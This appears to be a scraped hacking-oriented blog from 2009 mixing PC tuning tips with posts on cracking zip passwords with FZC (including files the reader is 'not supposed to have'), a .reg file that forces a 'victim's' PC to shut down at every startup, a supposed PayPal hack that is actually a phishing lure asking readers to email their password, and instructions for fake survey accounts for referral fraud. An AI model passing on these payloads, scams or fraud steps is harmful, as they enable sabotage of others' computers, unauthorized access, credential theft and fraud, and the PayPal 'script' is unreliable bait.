5. Run a utility like WCPUID and check the settings...is your CPU/front speed bus/AGP port running as fast as they should be? If not, check your drivers and BIOS configuration options. Also, are all of your chipset features enabled? If not, then enable them! (usually done in your BIOS!)

6. Dig in to the BIOS...check settings like boot order, for example...is it checking the floppy first? Change this! Select your order to reflect the hard drive first, then CD, then floppy for a noticeable boot time improvement. Also disable any non-used on board peripherals...for instance, - does your motherboard come with an on-board NIC card? Guess what, if you don't use that NIC card and it is enabled it will eat up valuable CPU cycles and can be detrimental to your systems' performance. DISABLE THAT MUTHA! Also, see if you can play with memory timing and CPU clock frequencies (NOTE! This is for expert users only!) Set these timings to "Aggressive" and see what happens in your games and apps...Also, check to see what your video aperature is set to. If you have a video card with 128 megs of on-baord memory, your aperature should be set to this amount too. Read the BIOS owner manual for further non-general performance tricks or improvements! Do you have the latest BIOS firmware version?

7. Under hardware properties, check to see that everything is working properly, and fix any hardware contention issues. You'll see the dreaded yellow exclamation point (!) beside any hardware componenet that is not working correctly.

8. Evaluate the potential for system/hardware upgrades...usually, the best bang for the buck is adding memory so buy all that you can afford (don't go much above 512 megs for Win 98 or ME). If you have a motherboard with an 8x - capable AGP port but you are using an older 4x video card, consider upgrading to an 8x card. You get the idea here...

9. Quit using software pigs like Norton system utilities, etc. These place files everywhere and can be a real system resource hog on lower end PCs.

10. Did I mention to make a good backup? Do it now! Also, while you're at it, run a good virus program with the latest definitions.

There are more options to make your system faster, such as overclocking, etc. but (just about) everything I've mentioned in this tech post costs you nothing and will result in faster system performance! Good luck and if you have any questions on how to do anything mentioned here, ask a knowledgeable friend or consult a book, - don't mess up something trying to do something you are not sure of!

Good luck and I'd like to dedicate this post to all of WorldWarez which has given me so much! You're all great, peeps!
READ MORE - Make Your PC Faster

0

Cracking Zip Password Files

Cracking Zip Password Files

Tut On Cracking Zip Password Files..
What is FZC? FZC is a program that cracks zip files (zip is a method of compressing multiple files into one smaller file) that are password-protected (which means you're gonna need a password to open the zip file and extract files out of it). You can get it anywhere - just use a search engine such as altavista.com.
FZC uses multiple methods of cracking - bruteforce (guessing passwords systematically until the program gets it) or wordlist attacks (otherwise known as dictionary attacks. Instead of just guessing passwords systematically, the program takes passwords out of a "wordlist", which is a text file that contains possible passwords. You can get lots of wordlists at www.theargon.com.).
FZC can be used in order to achieve two different goals: you can either use it to recover a lost zip password which you used to remember but somehow forgot, or to crack zip passwords which you're not supposed to have. So like every tool, this one can be used for good and for evil.
The first thing I want to say is that reading this tutorial... is the easy way to learn how to use this program, but after reading this part of how to use the FZC you should go and check the texts that come with that program and read them all. You are also going to see the phrase "check name.txt" often in this text. These files should be in FZC's directory. They contain more information about FZC.
FZC is a good password recovery tool, because it's very fast and also support resuming so you don't have to keep the computer turned on until you get the password, like it used to be some years ago with older cracking programs. You would probably always get the password unless the password is longer than 32 chars (a char is a character, which can be anything - a number, a lowercase or undercase letter or a symbol such as ! or &) because 32 chars is the maximum value that FZC will accept, but it doesn't really matter, because in order to bruteforce a password with 32 chars you'll need to be at least immortal..heehhe.. to see the time that FZC takes with bruteforce just open the Bforce.txt file, which contains such information.
FZC supports brute-force attacks, as well as wordlist attacks. While brute-force attacks don't require you to have anything, wordlist attacks require you to have wordlists, which you can get from www.theargon.com. There are wordlists in various languages, various topics or just miscellaneous wordlists. The bigger the wordlist is, the more chances you have to crack the password.
Now that you have a good wordlist, just get FZC working on the locked zip file, grab a drink, lie down and wait... and wait... and wait...and have good thoughts like "In wordlist mode I'm gonna get the password in minutes" or something like this... you start doing all this and remember "Hey this guy started with all this bullshit and didn't say how I can start a wordlist attack!..." So please wait just a little more, read this tutorial 'till the end and you can do all this "bullshit".

We need to keep in mind that are some people might choose some really weird passwords (for example: 'e8t7@$^%*gfh), which are harder to crack and are certainly impossible to crack (unless you have some weird wordlist). If you have a bad luck and you got such a file, having a 200MB list won't help you anymore. Instead, you'll have to use a different type of attack. If you are a person that gives up at the first sign of failure, stop being like that or you won't get anywhere. What you need to do in such a situation is to put aside your sweet xxx MB's list and start using the Brute Force attack.
If you have some sort of a really fast and new computer and you're afraid that you won't be able to use your computer's power to the fullest because the zip cracker doesn't support this kind of technology, it's your lucky day! FZC has multiple settings for all sorts of hardware, and will automatically select the best method.

Now that we've gone through all the theoretical stuff, let's get to the actual commands.


--------------------------------------------------------------------------------
Bruteforce
--------------------------------------------------------------------------------


The command line you'll need to use for using brute force is:

fzc -mb -nzFile.zip -lChr Lenght -cType of chars

Now if you read the bforce.txt that comes with fzc you'll find the description of how works Chr Lenght and the Type of chars, but hey, I'm gonna explain this too. Why not, right?... (but remember look at the bforce.txt too)

For Chr Lenght you can use 4 kind of switches...

-> You can use range -> 4-6 :it would brute force from 4 Chr passwors to 6 chr passwords
-> You can use just one lenght -> 5 :it would just brute force using passwords with 5 chars
-> You can use also the all number -> 0 :it would start brute forcing from passwords with lenght 0 to lenght 32, even if you are crazy i don't think that you would do this.... if you are thinking in doing this get a live...
-> You can use the + sign with a number -> 3+ :in this case it would brute force from passwords with lenght 3 to passwords with 32 chars of lenght, almost like the last option...

For the Type of chars we have 5 switches they are:

-> a for using lowercase letters
-> A for using uppercase letters
-> ! for using simbols (check the Bforce.txt if you want to see what simbols)
-> s for using space
-> 1 for using numbers


Example:
If you want to find a password with lowercase and numbers by brute force you would just do something like:

fzc -mb -nzTest.zip -l4-7 -ca1

This would try all combinations from passwords with 4 chars of lenght till 7 chars, but just using numbers and lowercase.

*****
hint
*****

You should never start the first brute force attack to a file using all the chars switches, first just try lowercase, then uppercase, then uppercase with number then lowercase with numbers, just do like this because you can get lucky and find the password much faster, if this doesn't work just prepare your brain and start with a brute force that would take a lot of time. With a combination like lowercase, uppercase, special chars and numbers.


--------------------------------------------------------------------------------
Wordlis
--------------------------------------------------------------------------------

Like I said in the bottom and like you should be thinking now, the wordlist is the most powerfull mode in this program. Using this mode, you can choose between 3 modes, where each one do some changes to the text that is in the wordlist, I'm not going to say what each mode does to the words, for knowing that just check the file wlist.txt, the only thing I'm going to tell you is that the best mode to get passwords is mode 3, but it takes longer time too.
To start a wordlist attak you'll do something like.

fzc -mwMode number -nzFile.zip -nwWordlist

Where:

Mode number is 1, 2 or 3 just check wlist.txt to see the changes in each mode.
File.zip is the filename and Wordlist is the name of the wordlist that you want to use. Remember that if the file or the wordlist isn't in the same directory of FZC you'll need to give the all path.

You can add other switches to that line like -fLine where you define in which line will FZC start reading, and the -lChar Length where it will just be read the words in that char length, the switche works like in bruteforce mode.
So if you something like

fzc -mw1 -nztest.zip -nwMywordlist.txt -f50 -l9+

FZC would just start reading at line 50 and would just read with length >= to 9.

Example:

If you want to crack a file called myfile.zip using the "theargonlistserver1.txt" wordlist, selecting mode 3, and you wanted FZC to start reading at line 50 you would do:

fzc -mw3 -nzmyfile.zip -nwtheargonlistserver1.txt -f50





--------------------------------------------------------------------------------
Resuming
--------------------------------------------------------------------------------

Other good feature in FZC is that FZC supports resuming. If you need to shutdown your computer and FZC is running you just need to press the ESC key, and fzc will stop. Now if you are using a brute force attack the current status will be saved in a file called resume.fzc but if you are using a wordlist it will say to you in what line it ended (you can find the line in the file fzc.log too).
To resume the bruteforce attack you just need to do:

fzc -mr

And the bruteforce attack will start from the place where it stopped when you pressed the ESC key.
But if you want to resume a wordlist attack you'll need to start a new wordlist attack, saying where it's gonna start. So if you ended the attack to the file.zip in line 100 using wordlist.txt in mode 3 to resume you'll type

fzc -mw3 -nzfile.zip -nwwordlist.txt -f100

Doing this FZC would start in line 100, since the others 99 lines where already checked in an earlier FZC session.


Well, it looks like I covered most of what you need to know. I certainly hope it helped you... don't forget to read the files that come with the program
READ MORE - Cracking Zip Password Files

Monday, June 29, 2009

0

Disable the account in win Xp



This is my life for men undisable administrator account / admin in My School. This
I want to show the user logged in with administrator [accident can successfully
password via adminnya Keylogger: p] on the display but does not have an account logon laen than
user

Mendisable with your account, your account does not appear on the display logon

First open C: \ Windows \ System32 search lusrmgr.msc double click the file. On the left, the 'Local Users and groups (local) select' user ', now select the account you want in there.


How to disable accounts stay klik2 times aja account that in there. Marked
checkbox on the 'Account is disabled'

Now restart or logoff computer aja nya. Tuh kan disable the account earlier in the ga
display logon. Although with the Ctrl + alt + del 2 times, are filling the username and password, it can not be fixed. because the account has been disabled.
READ MORE - Disable the account in win Xp

Sunday, June 28, 2009

0

Shutdown your friend's computer everytime it start

Thats really easy.
put this followin text in a .reg file and run it in the victims pc:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"VIRUS"="%windir%\\SYSTEM32\\SHUTDOWN.EXE -t 1 -c \"Howz this new Virus ah\" -f"

DONT PUT IT IN UR COMPUTER, I am not RESPONSIBLE, if it happens, to you, start windows in safe mode, and open registry editor by typiing REGEDIT in start->run. navigate to [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]and remove the string value named VIRUS, restart you computer.
You can also put this in a javascript code, just add this code to your webpage:

Be careful, a drawback of the js code is that NORTON ANTIVIRUS's script blocking feature may block this.
well i am also trying to find the method which executes without any drawbacks. So if u have one, pls post it here.
ENJOY !!!
READ MORE - Shutdown your friend's computer everytime it start

Sunday, June 14, 2009

1

How To hack Paypal?

If have 5-10$ in your paypal account, paypal anda akan menerima uang ribuan dolar hanya dalam waktu 48 jam.

let's start

there are two ways :

1.Using paypal hack program

Download HERE




or

2.Using paypal hack script

With send email

to: imampaypal1@ymail.com
subject : autobot-paypalserver

content-type:text/plain.dat
charset=us-ascii address000%%confirmationServer.paypal.com p38yle00rm::s%%http://www.paypal.com/%% %%http://www.paypal.com/%%/view-email# your e-mail%%passmailverif=?yourpasswod
start(retrieve>float)
verified(value=*float)
searchsgend48hr
send&&idR20734-tsa-0583#
endofmsg







READ MORE - How To hack Paypal?

Thursday, June 11, 2009

0

How TO HACK AWSurveys

U can earn hundred dollar with easy.,.,
important : in awsurveys you can't create account more than one .
but we will try to hack

OK let's Begin.

Step 1
-You Must sing up in awsurveys click here

Step 2
-You download " Hide My IP 2009" click here

Step3
-Install "Hide MY IP 2009"

after finish
-Click Hide My IP

-Okey Now , Your IP is Hidden

-And than , you make fake account to awsurveys with your referral link

example referral link
http://www.AWSurveys.com/HomeMain.cfm?RefID=imol21

you have a refferal link if you sing up !

-Next, create a fake account as much as possible
But you must remember , one account only for one IP address , so please replace with your ip with "Hide My IP 2009"

look thisright click "change IP"

-Well. create a fake account as much as possible n earn hundreds dollar in 2 hours only. hahahaha .
continue to hack


let's try
READ MORE - How TO HACK AWSurveys

Advanced Technology

Advanced Technology Headline Animator

vgi6wq3kfs Search Engine Submission - AddMe